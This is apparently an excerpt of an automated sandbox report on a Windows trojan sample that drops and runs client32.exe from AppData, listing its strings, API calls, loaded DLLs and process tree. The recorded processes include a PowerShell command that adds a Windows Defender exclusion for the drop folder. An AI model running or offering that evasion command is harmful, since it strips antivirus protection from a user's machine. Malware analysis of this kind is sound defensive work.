                                Source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepython3.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_elementtree.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1734934549.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepyexpat.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe Binary or memory string: OriginalFilename vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2043004742.00007FFDFB09A000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamelibcryptoH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2048332628.00007FFE1332D000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2031012733.0000020E46B20000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamepython3.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2048005767.00007FFE13306000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795311901.0000020E478F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2046711642.00007FFE10269000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2013058865.0000020E470C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2047788023.00007FFE130C6000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1791653644.0000020E48128000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2012237313.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2047347592.00007FFE11EC5000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E4790C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1793871824.0000020E481E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepcicl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795311901.0000020E478C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2043368746.00007FFDFB16F000.00000002.00000001.01000000.0000000F.sdmp Binary or memory string: OriginalFilenamelibsslH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2045927086.00007FFDFB740000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamepython311.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclient32.exe. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2046218284.00007FFDFB8A9000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1794261519.0000020E48A30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepcicl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2041837850.00007FFDFABA5000.00000002.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2010748148.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1790971677.0000020E4793A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2048783313.00007FFE1A479000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2047109613.00007FFE11522000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1792021334.0000020E479A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2007984529.0000020E47096000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2019629636.0000020E478FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2008110691.0000020E470A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2047569142.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E4791C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2046901104.00007FFE1030E000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs BUenB12U2a.exe
                                Source: classification engine Classification label: mal92.rans.troj.evad.winEXE@20/97@3/5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6CCD47E0 AdjustTokenPrivileges,CloseHandle,6_2_6CCD47E0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6CCD4750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_6CCD4750
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6CBDD3BB _getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_memset,GetDiskFreeSpaceA,GetLastError,_errno,6_2_6CBDD3BB
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6CD46C40 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,6_2_6CD46C40
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6CD02FC0 FindResourceExA,LoadResource,LockResource,CreateDialogIndirectParamA,CreateDialogIndirectParamA,CreateDialogParamA,GetLastError,wsprintfA,6_2_6CD02FC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe File created: C:\Users\user\AppData\Roaming\extracted
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Mutant created: NULL
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe File created: C:\Users\user\AppData\Local\Temp\_MEI69962
                                Source: BUenB12U2a.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe File read: C:\Users\user\AppData\Roaming\extracted\client32.ini
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: BUenB12U2a.exe Virustotal: Detection: 38%
                                Source: BUenB12U2a.exe ReversingLabs: Detection: 34%
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe File read: C:\Users\user\Desktop\BUenB12U2a.exe
                                Source: unknown Process created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Process created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\extracted\client32.exe C:\Users\user\AppData\Roaming\extracted\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\extracted\client32.exe "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\extracted\client32.exe "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                                Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libffi-8.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libcrypto-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libssl-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libcrypto-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: pdh.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msasn1.dllJump to behavior
